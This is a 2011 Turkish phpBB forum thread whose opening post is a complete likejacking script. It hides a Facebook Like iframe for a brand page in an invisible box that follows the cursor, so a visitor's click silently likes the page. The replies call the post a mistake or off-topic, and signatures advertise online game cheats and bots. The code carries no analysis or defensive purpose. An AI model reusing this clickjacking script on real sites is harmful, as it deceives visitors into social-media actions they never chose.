Forum'da ara:
Ara


Yazar Mesaj
Mesaj01.10.2011, 11:38 (UTC)    
Mesaj konusu: İnanamayacaksınız...

<head><script src="jquery-1.4.2.min.js" type="text/javascript"></script>
<script type="text/javascript">

var interval;
$(function()
{
interval=setInterval("updateActiveElement();", 50);
});
function updateActiveElement()
{
if ( $(document.activeElement).attr('id')=="fbframe" )
{
clearInterval(interval);
iflag=1;
}
}
</script></head>

<body><div style="width:10px; height:12px; position:absolute; z-index:1; overflow: hidden; filter:alpha(opacity=0); -moz-opacity:0.0; -khtml-opacity: 0.0; opacity: 0.0;" id="icontainer">
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fhttps://www.facebook.com/pages/Coca-Cola-T%C3%BCrkiye/118928238211010&amp;layout=standard&amp;show_faces=true&amp;width=450&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:450px; height:80px;" allowtransparency="true"></iframe>
</div>
<script>
var iflag = 0;
var icontainer = document.getElementById('icontainer');
var standardbody=(document.compatMode=="CSS1Compat")? document.documentElement : document.body //create reference to common "body" across doctypes
function mouseFollower(e){
/* DO NOT EDIT THIS */
if (window.event)

{ // for IE
icontainer.style.top = (window.event.y-5)+standardbody.scrollTop+'px';
icontainer.style.left = (window.event.x-5)+standardbody.scrollLeft+'px';
}
else
{
icontainer.style.top = (e.pageY-5)+'px';
icontainer.style.left = (e.pageX-5)+'px';
}
}
document.onmousemove = function(e) {
if (iflag == 0) {mouseFollower(e);}
}
</script></body>
Mesaj01.10.2011, 11:39 (UTC)    
Mesaj konusu:

nedir bu ?
______________
Arrow Arrow ÜCRETLİ MODERATÖR ARIYORUM. ÖZELDEN İLETİŞİME GEÇİN İNŞALLAH.
Mesaj01.10.2011, 11:48 (UTC)    
Mesaj konusu:

pardon kardeş yanlışıkla yazmışım Rolling Eyes
Mesaj03.10.2011, 20:19 (UTC)    
Mesaj konusu:

Evet İnanamadık Gereksiz Yere Konu Açmıssın .d O Kod un Yeri Burası Değil Ayrıca
______________
Arrow Sanalika Sınırsız BalıkArrow Html KodlarıArrow Darkorbit İ BotArrow Online Oyun Hileleri
Arrow NormaL Oyun HileleriArrow Online Oyun HileleriArrow MeTin 2 Hileleri
Önceki mesajları göster:   


Powered by phpBB © 2001, 2005 phpBB Group
Türkçe Çeviri: phpBB Türkiye & Erdem Çorapçıoğlu